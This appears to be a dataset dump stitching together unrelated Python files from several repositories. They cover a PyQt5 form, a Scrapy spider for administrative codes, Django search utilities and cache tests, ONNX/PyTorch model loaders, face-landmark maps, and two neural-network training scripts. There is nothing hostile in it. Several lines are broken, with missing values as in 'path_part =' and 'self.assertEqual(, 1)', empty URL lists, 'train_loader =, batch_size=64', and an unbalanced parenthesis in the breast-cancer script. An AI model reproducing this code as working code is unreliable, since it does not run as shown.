#### File: Python_source/心语/Ui_心语 ```python from PyQt5 import QtCore, QtGui, QtWidgets class Ui_Form(object): def setupUi(self, Form): Form.setObjectName("Form") Form.resize(1000, 618) Form.setMinimumSize(QtCore.QSize(1000, 618)) Form.setMaximumSize(QtCore.QSize(1000, 618)) font = QtGui.QFont() font.setFamily("华文细黑") font.setBold(False) font.setWeight(50) Form.setFont(font) icon = QtGui.QIcon() icon.addPixmap(QtGui.QPixmap("F:/桌面美化/ICO/爱心.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off) Form.setWindowIcon(icon) Form.setStyleSheet("background-image:url(D:/A_图/beijing.jpg);") self.label = QtWidgets.QLabel(Form) self.label.setGeometry(QtCore.QRect(20, 10, 71, 71)) self.label.setStyleSheet("QLabel\n" "{\n" " background:transparent;\n" "}") self.label.setText("") self.label.setPixmap(QtGui.QPixmap("F:/桌面美化/ICO/爱心.png")) self.label.setObjectName("label") self.label_2 = QtWidgets.QLabel(Form) self.label_2.setGeometry(QtCore.QRect(90, 20, 54, 19)) self.label_2.setStyleSheet("QLabel\n" "{\n" " font-size : 15pt;\n" " background:transparent;\n" "}\n" "\n" "\n" "") self.label_2.setObjectName("label_2") self.pushButton = QtWidgets.QPushButton(Form) self.pushButton.setGeometry(QtCore.QRect(190, 40, 261, 151)) self.pushButton.setStyleSheet("QPushButton \n" "{\n" " \n" " background-color:rgb(255,255,255); \n" " color:rgb(6,168,255); \n" " border:2px solid rgb(6,168,255); \n" " font-size:14px; \n" " border-radius:10px;\n" "}\n" "QPushButton:hover\n" "{\n" " background-color: rgb(212,243,255); \n" " color:rgb(6,168,255);\n" " border:2px solid rgb(6,168,255); \n" " border-radius:14px;\n" "}\n" "QPushButton:pressed\n" "{\n" " background-color: rgb(175,232,255); \n" " color:white; \n" " border:2px solid rgb(6,168,255); \n" " border-radius:14px;\n" "}") self.pushButton.setText("") self.pushButton.setObjectName("pushButton") self.pushButton_2 = QtWidgets.QPushButton(Form) self.pushButton_2.setGeometry(QtCore.QRect(200, 50, 50, 50)) self.pushButton_2.setStyleSheet("/*按钮静止无操作样式*/\n" "QPushButton\n" "{\n" " background-image:rgb(255,255,255); \n" " border-radius:25px;\n" " border:2px solid rgb(6,168,255);\n" " \n" " \n" "}\n" "\n" "/*鼠标悬停在按钮*/\n" "QPushButton:hover\n" "{\n" " background-color: rgb(212,243,255);\n" " color:rgb(6,168,255);\n" " border:2px solid rgb(6,168,255);\n" " border-radius:25px;\n" "}\n" "\n" "/*鼠标按下按钮*/\n" "QPushButton:pressed\n" "{\n" " background-color: rgb(175,232,255);\n" " color:white;\n" " border:2px solid rgb(6,168,255);\n" " border-radius:25px;\n" "}") self.pushButton_2.setText("") icon1 = QtGui.QIcon() icon1.addPixmap(QtGui.QPixmap("F:/桌面美化/ICO/favicon (2).ico"), QtGui.QIcon.Normal, QtGui.QIcon.Off) self.pushButton_2.setIcon(icon1) self.pushButton_2.setIconSize(QtCore.QSize(50, 50)) self.pushButton_2.setObjectName("pushButton_2") self.pushButton_3 = QtWidgets.QPushButton(Form) self.pushButton_3.setGeometry(QtCore.QRect(250, 50, 75, 23)) font = QtGui.QFont() font.setFamily("华文隶书") font.setPointSize(11) font.setBold(True) font.setWeight(75) self.pushButton_3.setFont(font) self.pushButton_3.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor)) self.pushButton_3.setStyleSheet("/*按钮静止无操作样式*/\n" "QPushButton \n" "{\n" " background:transparent;\n" "}\n" "\n" "/*鼠标悬停在按钮*/\n" "QPushButton:hover\n" "{\n" " background:transparent;\n" " text-decoration:underline;\n" "}\n" "\n" "/*鼠标按下按钮*/\n" "QPushButton:pressed\n" "{\n" "#测试;\n" "}") self.pushButton_3.setObjectName("pushButton_3") self.label_3 = QtWidgets.QLabel(Form) self.label_3.setGeometry(QtCore.QRect(260, 80, 161, 16)) font = QtGui.QFont() font.setFamily("Bahnschrift Condensed") self.label_3.setFont(font) self.label_3.setStyleSheet("QLabel\n" "{\n" " background:transparent;\n" "}") self.label_3.setObjectName("label_3") self.textBrowser = QtWidgets.QTextBrowser(Form) self.textBrowser.setGeometry(QtCore.QRect(200, 110, 241, 75)) font = QtGui.QFont() font.setFamily("华文隶书") font.setBold(False) font.setWeight(50) self.textBrowser.setFont(font) self.textBrowser.setStyleSheet("") self.textBrowser.setObjectName("textBrowser") self.label_4 = QtWidgets.QLabel(Form) self.label_4.setGeometry(QtCore.QRect(270, 320, 281, 61)) self.label_4.setStyleSheet("QLabel{\n" "\n" "border-radius:12px\n" "\n" "\n" "}") self.label_4.setObjectName("label_4") self.retranslateUi(Form) QtCore.QMetaObject.connectSlotsByName(Form) def retranslateUi(self, Form): _translate = QtCore.QCoreApplication.translate Form.setWindowTitle(_translate("Form", "心语")) self.label_2.setText(_translate("Form", "<html><head/><body><p><span style=\" color:#aaffff;\">〇〇3</span></p></body></html>")) self.pushButton_3.setText(_translate("Form", "这个年纪")) self.label_3.setText(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"\">\n" "<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n" "p, li { white-space: pre-wrap; }\n" "</style></head><body style=\" font-family:\'Bahnschrift Condensed\'; font-size:9pt; font-weight:400; font-style:normal;\">\n" "<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'SimSun\'; font-size:10pt; font-weight:600; color:#00ff7f;\">12-4 23:47:06</span></p></body></html>")) self.textBrowser.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"\">\n" "<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n" "p, li { white-space: pre-wrap; }\n" "</style></head><body style=\" font-family:\'华文隶书\'; font-size:9pt; font-weight:400; font-style:normal;\">\n" "<p style=\" margin-top:0px; margin-bottom:15px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; line-height:24px; background-color:#ffffff;\"><span style=\" font-family:\'arial,宋体,sans-serif\'; font-size:14px; color:#333333; background-color:#ffffff;\">慈母用手中的针线,为远行的儿子赶制身上的衣衫。临行前一针针密密地缝缀,怕的是儿子回来得晚衣服破损。有谁敢说,子女像小草那样微弱的孝心,能够报答得了像春晖普泽的慈母恩情呢?</span></p></body></html>")) self.label_4.setText(_translate("Form", "TextLabel")) ```
{ "source": "007gzs/china_admincode", "score": 3 }
#### File: admincode/spiders/ ```python import scrapy from admincode.items import AdmincodeItem class StatsSpider(scrapy.Spider): name = 'stats' allowed_domains = [''] start_urls = [''] def parse(self, response): for ret in self.parse_provincetr(response, response.selector.css(".provincetr")): yield ret for ret in self.parse_citytr(response, response.selector.css(".citytr")): yield ret for ret in self.parse_countytr(response, response.selector.css(".countytr")): yield ret for ret in self.parse_towntr(response, response.selector.css(".towntr")): yield ret for ret in self.parse_villagetr(response, response.selector.css(".villagetr")): yield ret def get_text_href(self, td): if not td.xpath('a'): return td.xpath('text()').extract()[0], None else: return td.xpath('a/text()').extract()[0], td.xpath('a/@href').extract()[0] def parse_provincetr(self, response, trs): for td in trs.xpath('td'): item = AdmincodeItem() item['codetype'] = 'province' item['name'], href = self.get_text_href(td) if href: item['code'] = href.split('.')[0] + ('0' * 10) item['parent_code'] = item.get_parent() item['url'] = response.urljoin(href) yield item if 'url' in item.keys(): yield scrapy.Request(item['url'], callback=self.parse) def parse_2td(self, response, trs, codetype): for tr in trs: item = AdmincodeItem() item['codetype'] = codetype item['code'], href = self.get_text_href(tr.xpath('td')[0]) item['parent_code'] = item.get_parent() if href: item['url'] = response.urljoin(href) item['name'], href = self.get_text_href(tr.xpath('td')[1]) if href: item['url'] = response.urljoin(href) yield item if 'url' in item.keys(): yield scrapy.Request(item['url'], callback=self.parse) def parse_citytr(self, response, trs): return self.parse_2td(response, trs, 'city') def parse_countytr(self, response, trs): return self.parse_2td(response, trs, 'county') def parse_towntr(self, response, trs): return self.parse_2td(response, trs, 'town') def parse_villagetr(self, response, trs): for tr in trs: item = AdmincodeItem() item['codetype'] = 'village' item['code'], href = self.get_text_href(tr.xpath('td')[0]) item['parent_code'] = item.get_parent() if href: item['url'] = response.urljoin(href) item['towntypecode'], href = self.get_text_href(tr.xpath('td')[1]) if href: item['url'] = response.urljoin(href) item['name'], href = self.get_text_href(tr.xpath('td')[2]) if href: item['url'] = response.urljoin(href) yield item if 'url' in item.keys(): yield scrapy.Request(item['url'], callback=self.parse) ```
{ "source": "007gzs/django-cool", "score": 2 }
#### File: cool/core/ ```python import operator from functools import reduce from django.core.exceptions import FieldDoesNotExist from django.db.models import Q from django.db.models.constants import LOOKUP_SEP def split_camel_name(name, fall=False): """ 驼峰命名分割为单词 GenerateURLs => [Generate, URLs] generateURLsLite => [generate, URLs, Lite] """ if not name: return [] lastest_upper = name[0].isupper() idx_list = [] for idx, char in enumerate(name): upper = char.isupper() # rising if upper and not lastest_upper: idx_list.append(idx) # falling elif fall and not upper and lastest_upper: idx_list.append(idx-1) lastest_upper = upper l_idx = 0 name_items = [] for r_idx in idx_list: if name[l_idx:r_idx]: name_items.append(name[l_idx:r_idx]) l_idx = r_idx if name[l_idx:]: name_items.append(name[l_idx:]) return name_items def construct_search(queryset, field_name): """ 生成搜索关键字 """ if field_name.startswith('^'): return "%s__istartswith" % field_name[1:] elif field_name.startswith('='): return "%s__iexact" % field_name[1:] # Use field_name if it includes a lookup. opts = queryset.model._meta lookup_fields = field_name.split(LOOKUP_SEP) # Go through the fields, following all relations. prev_field = None for path_part in lookup_fields: if path_part == 'pk': path_part = try: field = opts.get_field(path_part) except FieldDoesNotExist: # Use valid query lookups. if prev_field and prev_field.get_lookup(path_part): return field_name else: prev_field = field if hasattr(field, 'get_path_info'): # Update opts to follow the relation. opts = field.get_path_info()[-1].to_opts # Otherwise, use the field with icontains. return "%s__icontains" % field_name def get_search_results(queryset, search_term, search_fields, model): """ Return a tuple containing a queryset to implement the search and a boolean indicating if the results may contain duplicates. """ try: from django.contrib.admin.utils import ( lookup_needs_distinct as lookup_spawns_duplicates, ) except ImportError: from django.contrib.admin.utils import lookup_spawns_duplicates use_distinct = False if search_fields and search_term: orm_lookups = [construct_search(queryset, str(search_field)) for search_field in search_fields] for bit in search_term.split(): or_queries = [Q(**{orm_lookup: bit}) for orm_lookup in orm_lookups] queryset = queryset.filter(reduce(operator.or_, or_queries)) use_distinct |= any(lookup_spawns_duplicates(model._meta, search_spec) for search_spec in orm_lookups) return queryset, use_distinct ``` #### File: tests/model/ ```python from django.test import TestCase from tests.model import models class ModelTests(TestCase): def setUp(self): models.TestModel.objects.all().delete() models.SubModel.objects.all().delete() models.SubModel.objects.create(id=1, unique_field="sub1_unique_field") models.SubModel.objects.create(id=2, unique_field="sub2_unique_field") models.SubModel.objects.create(id=3, unique_field="sub3_unique_field") models.TestModel.objects.create( id=1, unique_field="obj1_unique_field", unique_field2_id=1, unique_field3_id='sub2_unique_field', unique_together1_field1="obj1_unique_together1_field1", unique_together1_field2="obj1_unique_together1_field2", unique_together2_field1="obj1_unique_together2_field1", unique_together2_field2="obj1_unique_together2_field2", unique_together2_field3="obj1_unique_together2_field3", unique_together3_field1="obj1_unique_together3_field1", unique_together3_field2=132, unique_together4_field1_id=2, unique_together4_field2_id='sub3_unique_field' ) models.TestModel.objects.create( id=2, unique_field="obj2_unique_field", unique_field2_id=3, unique_field3_id='sub1_unique_field', unique_together1_field1="obj2_unique_together1_field1", unique_together1_field2="obj2_unique_together1_field2", unique_together2_field1="obj2_unique_together2_field1", unique_together2_field2="obj2_unique_together2_field2", unique_together2_field3="obj2_unique_together2_field3", unique_together3_field1="obj2_unique_together3_field1", unique_together3_field2=232, unique_together4_field1_id=1, unique_together4_field2_id='sub2_unique_field' ) def test_pk(self): obj = models.TestModel.get_obj_by_pk_from_cache(1) self.assertIsInstance(obj, models.TestModel) self.assertEqual(, 1) self.assertEqual(obj.unique_field, 'obj1_unique_field') def test_pks(self): dict_keys_list = list() objs = models.TestModel.get_objs_by_pks_from_cache([2, 1], _dict_keys_list=dict_keys_list) self.assertIsInstance(objs, dict) self.assertEqual(len(dict_keys_list), 2) self.assertEqual(len(objs), 2) self.assertEqual(objs[dict_keys_list[0]].pk, 2) self.assertEqual(objs[dict_keys_list[0]].unique_field, 'obj2_unique_field') self.assertEqual(objs[dict_keys_list[1]].pk, 1) self.assertEqual(objs[dict_keys_list[1]].unique_field, 'obj1_unique_field') def test_unique_key(self): obj = models.TestModel.get_obj_by_unique_key_from_cache(unique_field='obj1_unique_field') self.assertIsInstance(obj, models.TestModel) self.assertEqual(, 1) self.assertEqual(obj.unique_field, 'obj1_unique_field') def test_unique_keys(self): dict_keys_list = list() objs = models.TestModel.get_objs_by_unique_keys_from_cache( unique_field=['obj1_unique_field', 'obj2_unique_field'], _dict_keys_list=dict_keys_list ) self.assertEqual(len(dict_keys_list), 2) self.assertIsInstance(objs, dict) self.assertEqual(len(objs), 2) self.assertEqual(objs[dict_keys_list[0]].pk, 1) self.assertEqual(objs[dict_keys_list[0]].unique_field, 'obj1_unique_field') self.assertEqual(objs[dict_keys_list[1]].pk, 2) self.assertEqual(objs[dict_keys_list[1]].unique_field, 'obj2_unique_field') def test_foreign_unique_key(self): obj = models.TestModel.get_obj_by_unique_key_from_cache(unique_field2='1') self.assertIsInstance(obj, models.TestModel) self.assertEqual(, 1) obj = models.TestModel.get_obj_by_unique_key_from_cache(unique_field2_id=1) self.assertIsInstance(obj, models.TestModel) self.assertEqual(, 1) obj = models.TestModel.get_obj_by_unique_key_from_cache(unique_field2=models.SubModel.objects.get(pk=1)) self.assertIsInstance(obj, models.TestModel) self.assertEqual(, 1) obj = models.TestModel.get_obj_by_unique_key_from_cache(unique_field3=models.SubModel.objects.get(pk=1)) self.assertIsInstance(obj, models.TestModel) self.assertEqual(, 2) def test_foreign_unique_keys(self): dict_keys_list = list() objs = models.TestModel.get_objs_by_unique_keys_from_cache( unique_field2=['1', 3], _dict_keys_list=dict_keys_list ) self.assertIsInstance(objs, dict) self.assertEqual(objs[dict_keys_list[0]].pk, 1) self.assertEqual(objs[dict_keys_list[1]].pk, 2) def test_unique_together(self): obj1 = models.TestModel.get_obj_by_unique_together_key_from_cache( unique_together1_field1="obj1_unique_together1_field1", unique_together1_field2="obj1_unique_together1_field2", ) self.assertIsInstance(obj1, models.TestModel) self.assertEqual(, 1) self.assertEqual(obj1.unique_field, 'obj1_unique_field') obj2 = models.TestModel.get_obj_by_unique_together_key_from_cache( unique_together2_field1="obj2_unique_together2_field1", unique_together2_field2="obj2_unique_together2_field2", unique_together2_field3="obj2_unique_together2_field3" ) self.assertIsInstance(obj2, models.TestModel) self.assertEqual(, 2) self.assertEqual(obj2.unique_field, 'obj2_unique_field') obj = models.TestModel.get_obj_by_unique_together_key_from_cache( unique_together3_field1="obj1_unique_together3_field1", unique_together3_field2=132 ) self.assertIsInstance(obj, models.TestModel) self.assertEqual(, 1) self.assertEqual(obj.unique_field, 'obj1_unique_field') obj = models.TestModel.get_obj_by_unique_together_key_from_cache( unique_together4_field1=models.SubModel.objects.get(pk=1), unique_together4_field2=models.SubModel.objects.get(pk=2) ) self.assertIsInstance(obj, models.TestModel) self.assertEqual(, 2) self.assertEqual(obj.unique_field, 'obj2_unique_field') obj = models.TestModel.get_obj_by_unique_together_key_from_cache( unique_together4_field1=2, unique_together4_field2='sub3_unique_field' ) self.assertIsInstance(obj, models.TestModel) self.assertEqual(, 1) self.assertEqual(obj.unique_field, 'obj1_unique_field') def test_unique_togethers(self): dict_keys_list = list() def _check(_objs, _dict_keys_list): self.assertIsInstance(_objs, dict) self.assertEqual(len(_dict_keys_list), 2) self.assertEqual(_objs[_dict_keys_list[0]].pk, 1) self.assertEqual(_objs[_dict_keys_list[0]].unique_field, 'obj1_unique_field') self.assertEqual(_objs[_dict_keys_list[1]].pk, 2) self.assertEqual(_objs[_dict_keys_list[1]].unique_field, 'obj2_unique_field') objs = models.TestModel.get_objs_by_unique_together_key_from_cache( unique_together1_field1=('obj1_unique_together1_field1', 'obj2_unique_together1_field1'), unique_together1_field2=('obj1_unique_together1_field2', 'obj2_unique_together1_field2'), _dict_keys_list=dict_keys_list ) _check(objs, dict_keys_list) objs = models.TestModel.get_objs_by_unique_together_key_from_cache( unique_together2_field1=('obj1_unique_together2_field1', 'obj2_unique_together2_field1'), unique_together2_field2=('obj1_unique_together2_field2', 'obj2_unique_together2_field2'), unique_together2_field3=('obj1_unique_together2_field3', 'obj2_unique_together2_field3'), _dict_keys_list=dict_keys_list ) _check(objs, dict_keys_list) objs = models.TestModel.get_objs_by_unique_together_key_from_cache( unique_together3_field1=('obj1_unique_together3_field1', 'obj2_unique_together3_field1'), unique_together3_field2=(132, 232), _dict_keys_list=dict_keys_list ) _check(objs, dict_keys_list) objs = models.TestModel.get_objs_by_unique_together_key_from_cache( unique_together4_field1=(models.SubModel.objects.get(pk=2), models.SubModel.objects.get(pk=1)), unique_together4_field2=(models.SubModel.objects.get(pk=3), models.SubModel.objects.get(pk=2)), _dict_keys_list=dict_keys_list ) _check(objs, dict_keys_list) objs = models.TestModel.get_objs_by_unique_together_key_from_cache( unique_together4_field1_id=(2, models.SubModel.objects.get(pk=1)), unique_together4_field2_id=('sub3_unique_field', models.SubModel.objects.get(pk=2)), _dict_keys_list=dict_keys_list ) _check(objs, dict_keys_list) def test_get_objs_from_cache(self): dict_keys_list = list() def _check(_objs, _dict_keys_list): self.assertIsInstance(_objs, dict) self.assertEqual(len(_dict_keys_list), 2) self.assertEqual(_objs[_dict_keys_list[0]].pk, 1) self.assertEqual(_objs[_dict_keys_list[0]].unique_field, 'obj1_unique_field') self.assertEqual(_objs[_dict_keys_list[1]].pk, 2) self.assertEqual(_objs[_dict_keys_list[1]].unique_field, 'obj2_unique_field') objs = models.TestModel.get_objs_from_cache( field_names=('unique_together1_field1', 'unique_together1_field2'), field_values=[ ('obj1_unique_together1_field1', 'obj1_unique_together1_field2'), ('obj2_unique_together1_field1', 'obj2_unique_together1_field2'), ], _dict_keys_list=dict_keys_list ) _check(objs, dict_keys_list) objs = models.TestModel.get_objs_from_cache( field_names=('unique_together2_field1', 'unique_together2_field2', 'unique_together2_field3'), field_values=[ ('obj1_unique_together2_field1', 'obj1_unique_together2_field2', 'obj1_unique_together2_field3'), ('obj2_unique_together2_field1', 'obj2_unique_together2_field2', 'obj2_unique_together2_field3'), ], _dict_keys_list=dict_keys_list ) _check(objs, dict_keys_list) objs = models.TestModel.get_objs_from_cache( field_names=('unique_together3_field1', 'unique_together3_field2'), field_values=[ ('obj1_unique_together3_field1', 132), ('obj2_unique_together3_field1', 232), ], _dict_keys_list=dict_keys_list ) _check(objs, dict_keys_list) objs = models.TestModel.get_objs_from_cache( field_names=('unique_together4_field1', 'unique_together4_field2'), field_values=[ (models.SubModel.objects.get(pk=2), models.SubModel.objects.get(pk=3)), (models.SubModel.objects.get(pk=1), models.SubModel.objects.get(pk=2)), ], _dict_keys_list=dict_keys_list ) _check(objs, dict_keys_list) objs = models.TestModel.get_objs_from_cache( field_names=('unique_together4_field1_id', 'unique_together4_field2_id'), field_values=[ (2, 'sub3_unique_field'), (models.SubModel.objects.get(pk=1), models.SubModel.objects.get(pk=2)), ], _dict_keys_list=dict_keys_list ) _check(objs, dict_keys_list) def test_flush_cache(self): from django.core.cache import cache from django.db import connection connection.force_debug_cursor = True real_obj = models.TestModel.objects.get(pk=1) sub_obj = models.SubModel.objects.get(pk=2) def _get_from_cache(): models.TestModel.get_obj_by_pk_from_cache(1) models.TestModel.get_obj_by_unique_key_from_cache(unique_field='obj1_unique_field') models.TestModel.get_obj_by_unique_key_from_cache(unique_field2_id=1) models.TestModel.get_obj_by_unique_key_from_cache(unique_field3=sub_obj) models.TestModel.get_obj_by_unique_together_key_from_cache( unique_together1_field1="obj1_unique_together1_field1", unique_together1_field2="obj1_unique_together1_field2", ) models.TestModel.get_obj_by_unique_together_key_from_cache( unique_together2_field1="obj1_unique_together2_field1", unique_together2_field2="obj1_unique_together2_field2", unique_together2_field3="obj1_unique_together2_field3" ) models.TestModel.get_obj_by_unique_together_key_from_cache( unique_together3_field1="obj1_unique_together3_field1", unique_together3_field2=132 ) cache.clear() connection.queries_log.clear() _get_from_cache() queries1 = connection.queries self.assertTrue(queries1) connection.queries_log.clear() _get_from_cache() self.assertFalse(connection.queries) real_obj.flush_cache() connection.queries_log.clear() _get_from_cache() queries2 = connection.queries def _get_sqls(queries): return list(map(lambda x: x['sql'], queries)) self.assertEqual(_get_sqls(queries1), _get_sqls(queries2)) ```
{ "source": "007gzs/oface", "score": 2 }
#### File: oface/model/ ```python from __future__ import absolute_import, unicode_literals import onnxruntime class ONNXModel: def __init__(self, model_file=None, session=None, task_name=''): self.model_file = model_file self.session = session self.task_name = task_name if self.session is None: assert self.model_file is not None self.session = onnxruntime.InferenceSession(self.model_file, None) ```
{ "source": "007gzs/xface", "score": 2 }
#### File: xface/core/ ```python from __future__ import absolute_import, unicode_literals # it's a approximate map # 15 --> (99+103)/2 # 17, 19; 20, 22; 16; 9 will be used in face crop(25 points) lms25_2_lms106 = {1: 105, 2: 106, 3: 34, 4: 38, 5: 43, 6: 47, 7: 52, 8: 55, 9: 88, 10: 94, 11: 85, 12: 91, 13: 63, 14: 59, 15: 99, 16: 61, 17: 71, 18: 73, 19: 67, 20: 80, 21: 82, 22: 76, 23: 36, 24: 45, 25: 17} # 1: left eye center # 2: right eye center # 3: nose tip # 4: left mouth corner # 5: right mouth corner lms5_2_lms25 = {1: 1, 2: 2, 3: 8, 4: 11, 5: 12} lms5_2_lms106 = {1: 105, 2: 106, 3: 55, 4: 85, 5: 91} def lms106_2_lms25(lms_106): lms25 = [] for cur_point_index in range(25): cur_point_id = cur_point_index + 1 point_id_106 = lms25_2_lms106[cur_point_id] cur_point_index_106 = point_id_106 - 1 cur_point_x = lms_106[cur_point_index_106 * 2] cur_point_y = lms_106[cur_point_index_106 * 2 + 1] lms25.append(cur_point_x) lms25.append(cur_point_y) return lms25 def lms106_2_lms5(lms_106): lms5 = [] for cur_point_index in range(5): cur_point_id = cur_point_index + 1 point_id_106 = lms5_2_lms106[cur_point_id] cur_point_index_106 = point_id_106 - 1 cur_point_x = lms_106[cur_point_index_106 * 2] cur_point_y = lms_106[cur_point_index_106 * 2 + 1] lms5.append(cur_point_x) lms5.append(cur_point_y) return lms5 def lms25_2_lms5(lms_25): lms5 = [] for cur_point_index in range(5): cur_point_id = cur_point_index + 1 point_id_25 = lms5_2_lms25[cur_point_id] cur_point_index_25 = point_id_25 - 1 cur_point_x = lms_25[cur_point_index_25 * 2] cur_point_y = lms_25[cur_point_index_25 * 2 + 1] lms5.append(cur_point_x) lms5.append(cur_point_y) return lms5 ``` #### File: xface/model/ ```python from __future__ import absolute_import, unicode_literals import json import os import sys import torch class Config(dict): def __getattr__(self, key): if key in self: return self[key] return None def __setattr__(self, key, value): self[key] = value class Base: def __init__(self, model_path, model_category, model_name, meta_file='model_meta.json'): model_root_dir = os.path.join(model_path, model_category, model_name) meta_file_path = os.path.join(model_root_dir, meta_file) with open(meta_file_path, 'r') as f: self.meta_conf = json.load(f) model_root = os.path.dirname(model_path) if model_root not in sys.path: sys.path.append(model_root) self.model_path = model_path self.model_category = model_category self.model_name = model_name self.model_file_path = os.path.join(model_root_dir, self.meta_conf['model_file']) self.model_type = self.meta_conf['model_type'] self.model_info = self.meta_conf['model_info'] self.release_date = self.meta_conf['release_date'] self.input_height = self.meta_conf['input_height'] self.input_width = self.meta_conf['input_width'] self.device = None self.model = None def load(self, device=None): assert self.model is None if device is None: if torch.cuda.is_available(): device = "cuda:%d" % torch.cuda.current_device() else: device = "cpu" self.device = torch.device(device) self.model = torch.load(self.model_file_path, map_location=self.device) self.model.eval() ```
{ "source": "007HarshChaudhary/Deep-Learning", "score": 2 }
#### File: 007HarshChaudhary/Deep-Learning/ ```python import torch from torch import optim, nn import torch.nn.functional as F from torchvision import datasets, transforms import helper import time import matplotlib.pyplot as plt import numpy as np from import SubsetRandomSampler transform = transforms.Compose([transforms.ToTensor()]) trainset = datasets.FashionMNIST('Fashion_MNIST', train=True, download=True, transform=transform) valid_size = 0.2 num_train = len(trainset) indices = list(range(num_train)) np.random.shuffle(indices) split = int(valid_size*num_train) train_idx, valid_idx = indices[split: ], indices[ :split] train_sampler = SubsetRandomSampler(train_idx) valid_sampler = SubsetRandomSampler(valid_idx) train_loader =, batch_size=64, sampler=train_sampler) valid_loader =, batch_size=64, sampler=valid_sampler) testset = datasets.FashionMNIST('Fashion_MNIST', train=False, download=True, transform=transform) test_loader =, batch_size=64, shuffle=True) class Network(nn.Module): def __init__(self): super().__init__() self.fc1 = nn.Linear(784, 356) self.batchnorm1 = nn.BatchNorm1d(356) self.fc2 = nn.Linear(356, 124) self.batchnorm2 = nn.BatchNorm1d(124) self.fc3 = nn.Linear(124, 64) self.batchnorm3 = nn.BatchNorm1d(64) self.fc4 = nn.Linear(64, 10) self.dropout = nn.Dropout(0.2) def forward(self, x): x = x.view(-1, 784) x = self.dropout(F.relu(self.batchnorm1(self.fc1(x)))) x = self.dropout(F.relu(self.batchnorm2(self.fc2(x)))) x = self.dropout(F.relu(self.batchnorm3(self.fc3(x)))) x = F.log_softmax(self.fc4(x), dim=1) return x model = Network() model.cuda() criterion = nn.NLLLoss() optimizer = optim.Adam(model.parameters(), lr=0.003) start = time.time() epochs = 30 train_losses=[] valid_losses=[] min_validation_loss = np.Inf for e in range(epochs): running_loss = 0 model.train() for images, labels in train_loader: images = images.cuda() labels = labels.cuda() output = model(images) loss = criterion(output, labels) optimizer.zero_grad() loss.backward() optimizer.step() running_loss += loss.item() valid_loss = 0 validation_accuracy = 0 model.eval() with torch.no_grad(): for images, labels in valid_loader: images = images.cuda() labels = labels.cuda() output = model(images) valid_loss += criterion(output, labels) ps = torch.exp(output) top_p, top_class = ps.topk(1, dim=1) equals = top_class==labels.view(*top_class.shape) validation_accuracy += torch.mean(equals.type(torch.FloatTensor)) valid_loss /= len(valid_loader) running_loss = running_loss/len(train_loader) valid_losses.append(valid_loss) train_losses.append(running_loss) print("Epoch: {}/{} ".format(e+1, epochs), "Training Loss: {:.3f} ".format(running_loss), "Validation Loss: {:.3f} ".format(valid_loss), "Validation Accuracy: {:.3f}".format(validation_accuracy/len(valid_loader))) if valid_loss < min_validation_loss: print('Validation loss decreased {:.4f}--->{:.4f} saving model'.format(min_validation_loss, valid_loss)) min_validation_loss = valid_loss, '') print() print("Total time to train {}".format(time.time()-start)) # model.cpu() # images, labels = next(iter(test_loader)) # output = model(images[0]) # helper.view_classify(images[0], torch.exp(output), version='Fashion') plt.plot(train_losses, label='training loss') plt.plot(valid_losses, label='validation loss') plt.legend(frameon=False) model.load_state_dict(torch.load('')) test_loss = 0.0 class_correct = list(0. for i in range(10)) class_total = list(0. for i in range(10)) model.eval() # prep model for evaluation with torch.no_grad(): for data, target in test_loader: # forward pass: compute predicted outputs by passing inputs to the model data=data.cuda() target=target.cuda() output = model(data) # calculate the loss loss = criterion(output, target) # update test loss test_loss += loss.item() # convert output probabilities to predicted class _, pred = torch.max(output, 1) # compare predictions to true label correct = np.squeeze(pred.eq( # calculate test accuracy for each object class for i in range(len(target)): label =[i] class_correct[label] += correct[i].item() class_total[label] += 1 # calculate and print avg test loss test_loss = test_loss/len(test_loader) print('Test Loss: {:.6f}\n'.format(test_loss)) for i in range(10): if class_total[i] > 0: print('Test Accuracy of %5s: %2d%% (%2d/%2d)' % ( str(i), 100 * class_correct[i] / class_total[i], np.sum(class_correct[i]), np.sum(class_total[i]))) else: print('Test Accuracy of %5s: N/A (no training examples)' % (classes[i])) print('\nTest Accuracy (Overall): %2d%% (%2d/%2d)' % ( 100. * np.sum(class_correct) / np.sum(class_total), np.sum(class_correct), np.sum(class_total))) ```
{ "source": "007mathur/BreastCancerClassification", "score": 3 }
#### File: 007mathur/BreastCancerClassification/ ```python from nn import relu, sigmoid, tanh, softmax from nn.model import Model from nn.layers import Layer from nn.losses import CrossEntropyLoss, BinaryCrossEntropyLoss from nn.pipeline import DataLoader import numpy as np import pandas as pd import time t = time.process_time() from sklearn.datasets import load_breast_cancer cancer = load_breast_cancer() from sklearn.preprocessing import MinMaxScaler scaler = MinMaxScaler() df_cancer = pd.DataFrame(np.c_[cancer['data'], cancer['target']], columns = np.append(cancer['feature_names'], ['target'])) all_data = df_cancer.values np.random.shuffle(all_data) split = int(0.9 * all_data.shape[0]) x_train = all_data[:split, 0:-1] x_test = all_data[split:, 0:-1] y_train = all_data[:split, -1] y_test = all_data[split:, -1] def one_hot(y, depth=10): y_1hot = np.zeros((y.shape[0], depth)) y_1hot[np.arange(y.shape[0]), y] = 1 return y_1hot y_train = one_hot(y_train.astype('int'), depth=2) y_test = one_hot(y_test.astype('int'), depth=2) def accuracy(y, y_hat): y = np.argmax(y, axis=1) y_hat = np.argmax(y_hat, axis=1) return np.mean(y==y_hat) model = Model() model.add_layer(Layer(30, 7, relu))) model.add_layer(Layer(7, 2, softmax)) model.compile(CrossEntropyLoss, DataLoader, accuracy, batches_per_epoch=(x_train.shape[0]//16)+1, n_workers=12), y=y_train, epochs=100) y_hat = model.predict(x_test) print('Accuracy on test:', accuracy(y_test, y_hat)) elaped_time = time.process_time() - t print("Elapsed Time:", elaped_time) ```
{ "source": "007rohitSaini/commandline_pos", "score": 3 }
